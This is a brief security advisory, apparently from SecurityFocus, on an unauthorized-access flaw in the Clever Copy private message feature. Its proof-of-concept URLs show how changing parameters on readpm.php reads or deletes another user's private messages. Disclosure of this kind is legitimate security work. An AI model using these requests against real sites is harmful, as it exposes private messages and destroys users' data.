Clever Copy Private Message Unauthorized Access Vulnerability

No exploit is required.

The following proof of concepts are available:
http://www.example.com/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass
http://www.example.com/readpm.php?op=read&ID=2&user=waltrapass

http://www.example.com/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass
http://www.example.com/readpm.php?op=del&ID=2&user=waltrapass


 

Privacy Statement
Copyright 2010, SecurityFocus